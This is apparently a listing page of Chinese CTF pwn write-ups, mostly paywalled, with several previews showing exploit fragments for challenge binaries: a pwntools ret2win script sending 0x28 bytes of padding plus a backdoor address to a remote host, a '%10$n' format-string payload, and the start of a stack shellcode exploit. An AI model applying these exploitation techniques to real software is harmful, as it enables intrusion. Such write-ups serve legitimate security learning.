-
0xgame 2020 Pwn题滞销,帮帮我好吗_
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 17天前
-
0xgame 2020 0xPwn
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 18天前
-
0xgame 2020 easy stack
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 20天前
-
0xgame 2020 variable overlap
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 20天前
-
0xGame 2020
没开金丝雀,`read`函数读取大小为64字节变量`s`距离`r`处是`0x28`个字节后门函数地址是`0x0401162````pythonfrompwnimport*p=process('./main')p=remote('49.232.142.230',11228)p.sendafter("?",b'A'*0x28+p64(0x401162))p.interactive()```
- PWN
- 20天前
-
baby_fmt
分析伪代码程序一开始会读取/dev/urandom文件中内容并放到全局变量&dword_804C044中,即读取4字节的随机数存放到0x0804C044,并且存在格式化字符串漏洞,最后要求用户再输入一次密码,随后对输入的字符串转换为整数进行if逻辑判断。格式化字符串偏移为10所以可以利用格式字符漏洞对内存完成修改payload=p32(target)+b"%10$n"其中会以小端序的形式发...
- PWN
- 23天前
-
ezROP
题目给出一个菜单,分别是加密、解密和退出当选择1时,程序会进入加密函数当输入2时,程序会输出“Ithinkucan....”当输入3时,程序会退出分析加密函数,可以看到,程序存在一个栈溢出漏洞,并且会对用户的输入进行一系列加密,但是它使用的是strlen(),该函数会一直检查用户输入,直到遇到"\x00",所以可以在输入的第一个字符输入"\x00"就可以绕过它的加密逻辑,后续利用ret2libcG...
- PWN
- 23天前
-
TAMUctf-2019 pwn3
分析echo()程序泄露了栈地址,并且调用了gets(),由于程序开启了PIE(NX未开),可以利用栈溢出漏洞往栈上写shellcode,然后跳转到栈执行Exploit:frompwnimport*ip="49.232.142.230"port=17312p=remote(ip,port)p.recvuntil(b"journey")leak=p.recv(10)offset=302shellco...
- PWN
- 24天前
-
WolvCTF 2023 - catPWN 的超详细wp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- PWN
- 1月前
-
原神祈愿wp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
5 金币
- PWN
- 1月前
-
0xPwn3_fmt
分析sub_401192(),其中的sprintf()是将格式化数据输到特定数组或变量中的函数,其参数顺序为:目标 --> 格式 --> 数据。参数1:输出目的地,该变量为全局变量,内存地址为0x404080参数2:buf= 格式化字符串模板,函数会解析buf内的内容,里面的%s、%x等都会被当作格式指令参数3:buf=填充数据简单翻译...
- PWN
- 1月前
-
[TAMUctf - 2019] pwn2
分析main(),可以看到程序有一个栈溢出漏洞。并且会将用户或攻击者的输入当成参数传入select_func(),其中,strncpy()会将参数值拷贝0x1F字节。由于本题开启PIE的原因,所以简单的ROP无法完成跳转。通过动态调试可以看到,v3局部变量的内存地址似乎在print_flag()附近那这是否意味着,可以利用地址在同一内存页、高位地址不变的特点,只修改地址的低位,实现控制流劫持呢?即...
- PWN
- 1月前
-
Calling Convention 64 wp
通过分析vuln()可以发现题目有明显的栈溢出漏洞,并且设置了if判断语句,可以通过栈溢出和变量覆盖绕过分析win(),可以发现该函数也设置了相同的语句,不过通过栈溢出跳转到该函数时是直接判断,没有让用户输入,所以仅可设置一个payload。因为该题是64位下Linux可执行文件,所以在传递参数时,需要用寄存器传参payload=b"a"*(0x30-0x8)payload=b"a"*(0x30-...
- PWN
- 1月前
-
printf
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
5 金币
- PWN
- 1月前
-
str.vs.cstr
#CstringorC++string?##题目信息题目描述:>Whichdoyoulike,CstringorC++string?远程环境:```bashnc49.232.142.23013698```最终flag:```textCakeCTF{HW1:Remove\"call_me\"andsolveit/HW2:SetPIE+RELROandsolveit}```##程序保护对附件进行...
- PWN
- 2月前
-
瑞士军刀wp
这个命令没有回显
- PWN
- 2月前
-
[2020]0xGame-不会起名的废物
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 6月前
-
[2020]0xGame-该怎么起名呢
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 6月前
-
FlagMarket-WP
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 6月前
-
stronk boi
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- PWN
- 6月前